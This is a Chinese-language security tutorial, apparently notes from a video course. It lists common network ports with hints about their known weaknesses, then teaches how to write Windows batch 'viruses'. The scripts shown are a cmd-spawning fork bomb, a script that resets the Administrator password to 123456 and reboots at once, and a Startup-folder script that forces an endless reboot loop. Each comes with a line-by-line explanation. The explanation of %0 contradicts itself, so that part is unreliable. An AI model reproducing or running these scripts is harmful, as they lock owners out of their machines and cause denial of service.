网络安全之WINDOWS端口及病毒编写

一、常见端口和服务

二、Windows病毒编写

声明：学习视频来自b站up主泷羽sec，如涉及侵权马上删除文章

声明：本文主要用作技术分享，所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险，并遵循相关法律法规。

一、常见端口和服务

21：FTP 用于上传、下载文件。

22：SSH 用于通过命令行模式远程连接Linux服务器或vps。

23：Telnet 用于Telnet远程登录服务器。

25：SMTP 用于发送邮件。

80：HTTP 用于HTTP服务提供访问功能，例如，IIS、Apache、Nginx 等服务。

80-89端口可能是web，有的web服务不放在80端口，而是放在80-89中的一个端口

110：POP3 用于POP3 协议，POP3 是电子邮件收发的协议。

143：IMAP 用于IMAP（Internet Message Access Protocol）协议，IMAP 是用于电子邮件的接收的协议。

443：HTTPS 用于HTTPS服务提供访问功能。HTTPS 是一种能提供加密和通过安全端口传输的一种协

议。 (SSL心脏滴血漏洞)

445 SMB

1433：SQL Server SQL Server的TCP 端口，用于供SQL Server对外提供服务。

1434：SQL Server SQL Server的UDP端口，用于返回SQL Server使用了哪个 TCP/IP 端口。

1521：Oracle通信端口，服务器上部署了Oracle SQL需要放行的端口。

2082/2083 cpanel 主机管理系统登录（国外用的比较多）

2222 da虚拟主机管理系统登录（国外较多）

3128 squid代理默认端口（实现内网漫游）

3306：MySQL数据库对外提供服务的端口。

3312/3311 kangle主机管理系统登录

3389：远程桌面服务端口，可以通过这个端口远程连接服务器。

5432 postgreSQL一个关系型数据库

5900 VNC 链接设备（VNC未授权访问）

6379 redis (存在未授权)

7001、7002 weblogic (默认弱口令，反序列化)

7778 kioxo主机控制面板登录

8080/8089/9090 jboss

8080：代理端口,同80端口一样，8080 端口常用于WWW代理服务，实现网页浏览。

8083 vestacp主机管理系统登录

8649 ganglia

8888 宝塔主机管理系统

10000 virtuamin/webmin 服务器虚拟主机管理系统

11211 memcache （未授权访问）

27017、27018 mongodb (未授权访问)

28017 mongodb 统计系统页面

二、Windows病毒编写

资源耗尽病毒原理

echo start cmd >1.txt 将启动cmd的命令写入1.txt

echo %0>>1.txt 无限启动文件命令写入1.txt

ren 1.txt 1.bat 将1.txt文件重命名成脚本文件1.bat

代码解析：

echo start cmd >1.txt：这条命令的作用是在当前目录下创建一个名为1.txt的文本文件，并向其中写入字符串“start cmd”。这里的start是Windows命令行中的一个命令，用于启动一个程序或命令行工具，cmd是指命令提示符，即Windows的命令行界面。
echo %0 >>1.txt：这条命令的作用是将当前批处理脚本的名称（%0是一个特殊的变量，它代表当前批处理脚本的名称）追加到1.txt文件的末尾。这样，每次执行这个批处理脚本时，它都会将自己追加到文件中，形成一个无限循环。
ren 1.txt 1.bat：这条命令的作用是将1.txt文件重命名为1.bat。在Windows中，.bat文件是批处理脚本文件的扩展名，这样重命名后，原来的文本文件就变成了一个可执行的批处理脚本。

详解：

echo start cmd >1.txt
- echo 是一个在命令行中显示文本的命令。
- start cmd 是要显示的文本，start 命令用于启动一个程序或命令行进程，这里它将启动一个新的命令行窗口，并运行 cmd，即命令提示符。
- > 是一个重定向操作符，它将 echo 命令的输出从标准输出（通常是屏幕）重定向到一个文件。
- 1.txt 是要创建的文件名，> 操作符会创建这个文件，如果文件已存在，则会覆盖它。
echo %0 >>1.txt
- %0 是一个环境变量，它代表当前批处理文件的名称。
- >> 是一个追加重定向操作符，它会将输出追加到文件的末尾，而不是覆盖文件。
- 这行命令的效果是将当前批处理文件的名称追加到 1.txt 文件中。由于 %0 包含文件的扩展名（在这个例子中是 .bat），所以这实际上是将 1.bat 这个名称追加到了文件中。
ren 1.txt 1.bat
- ren 是一个命令，用于重命名文件。
- 1.txt 是要被重命名的原始文件名。
- 1.bat 是新的文件名，将 .txt 扩展名更改为 .bat，这样文件就变成了一个批处理文件。

将这些命令组合起来，这段代码的执行流程如下：

首先，创建一个名为 1.txt 的文件，并写入 start cmd 命令。
然后，将当前批处理文件的名称（1.bat）追加到 1.txt 文件中。
最后，将 1.txt 文件重命名为 1.bat。

当 1.bat 被执行时，它会启动一个新的命令行窗口，并且由于 %0 指向自身（1.bat），它会不断地追加自身到文件中，形成一个无限循环。每次执行 1.bat 时，都会启动一个新的命令行窗口，并且由于无限循环的自我引用，会导致越来越多的 cmd 窗口被打开，最终耗尽系统资源，可能导致系统变慢甚至崩溃。

注：

这段描述中有一点需要澄清：在原始代码中，%0 代表的是当前批处理脚本的名称，如果当前脚本的扩展名是 .bat，那么 %0 会包含这个扩展名。但是，在这个特定的例子中，当执行 echo %0 >>1.txt 命令时，%0 实际上不会包含 .bat 扩展名，因为 %0 只包含脚本的名称，不包含路径和扩展名。

%0 是一个特殊的变量，它代表当前正在执行的批处理文件的名称。如果当前批处理文件是 1.bat，那么 %0 就是 1.bat。
echo %0 >>1.txt 这条命令的作用是将 %0 的值（即当前批处理文件的名称）追加到 1.txt 文件的末尾。这里的 >> 是一个追加重定向操作符，它将命令的输出追加到指定的文件末尾，而不是覆盖文件内容。
由于 %0 变量包含了批处理文件的完整名称（在这个例子中是 1.bat），所以这条命令实际上是将 1.bat 这个字符串追加到了 1.txt 文件中。

因此，这段代码的意思是：将当前批处理文件的名称（包括扩展名）追加到 1.txt 文件中。这样，每次执行这个批处理脚本时，它都会将自己追加到 1.txt 文件中，形成一个无限循环。这会导致 1.txt 文件中包含多个 1.bat 字符串，每个字符串代表一次脚本执行时的自我引用。

自动锁机病毒原理

echo net user administrator 123456 > c:\windows\Temp\1.bat 修改管理员密码为123456并写入1.bat文件

echo shutdown /r /t 0 >> c:\windows\Temp\1.bat 将立刻关机命令写入1.bat文件，运行后直接修改管理员密码并锁机

代码解析：

echo net user administrator 123456 > c:\windows\Temp\1.bat
- echo 是一个命令，用于在命令行上显示文本或将文本发送到文件。
- net user administrator 123456 是一个用于修改用户账户密码的命令。这里它将本地管理员账户（通常用户名为 administrator）的密码更改为 123456。
- > 是一个重定向操作符，它将 echo 命令的输出从标准输出（屏幕）重定向到一个文件。在这里，它创建或覆盖 c:\windows\Temp\1.bat 文件，并写入 net user administrator 123456 命令。
- 结果是，在 C:\Windows\Temp 目录下创建了一个名为 1.bat 的批处理文件，其中包含修改管理员密码的命令。
echo shutdown /r /t 0 >> c:\windows\Temp\1.bat
- shutdown /r /t 0 是一个命令，用于立即重启计算机。/r 参数表示重启，/t 0 表示设置延迟时间为0秒。
- >> 是一个追加重定向操作符，它将 echo 命令的输出追加到已存在的文件末尾。在这里，它将 shutdown /r /t 0 命令追加到 c:\windows\Temp\1.bat 文件中。
- 结果是，1.bat 文件现在包含了两个命令：修改管理员密码的命令和立即重启计算机的命令。

当 1.bat 被执行时，它会：

首先，尝试将管理员账户的密码更改为 123456。
然后，立即重启计算机，没有任何延迟。

无限重启病毒原理

echo shutdown /r /t 0 >1.bat

copy 1.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

代码解析：

echo shutdown /r /t 0 >1.bat
- echo 命令用于在命令行中显示文本或将文本输出到文件。
- shutdown /r /t 0 是一个命令，用于立即重启计算机。/r 参数表示重启，/t 0 表示设置延迟时间为0秒。
- > 是一个重定向操作符，它将 echo 命令的输出从标准输出（屏幕）重定向到一个文件。在这里，它创建或覆盖当前目录下名为 1.bat 的文件，并写入 shutdown /r /t 0 命令。
- 结果是，在当前目录下创建了一个名为 1.bat 的批处理文件，其中包含立即重启计算机的命令。
copy 1.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
- copy 是一个命令，用于复制文件或目录树。
- 1.bat 是要复制的源文件，即上一步创建的包含重启命令的批处理文件。
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 是目标目录，这是Windows系统中的一个特殊目录，用于存储在计算机启动时自动运行的程序的快捷方式或批处理文件。
- 结果是，1.bat 文件被复制到 StartUp 目录中，这意味着每次计算机启动时，1.bat 中的命令（即立即重启计算机）将被执行。